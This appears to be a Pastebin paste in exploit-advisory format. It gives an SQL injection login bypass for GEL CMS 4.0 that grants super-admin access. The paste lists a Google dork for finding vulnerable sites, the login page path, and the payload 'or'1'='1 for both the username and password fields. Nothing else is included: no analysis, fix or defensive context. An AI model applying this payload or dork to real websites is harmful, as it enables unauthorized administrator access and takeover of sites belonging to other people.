Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ** Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
- ** Google Dork: inurl:/contact-us_id7.php
- ** Date: 11 August 2014
- ** Exploit Author: Guillermo Garcia Marcos @GuilleSec
- ** Severity: High
- ** Versions: 4.00 and latest versions.
- ** Tested on: Debian (Apache+MySQL)
- Loginpanel:
- domain.lol/login.php
- SQL string:
- Username: 'or'1'='1
- Password: 'or'1'='1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement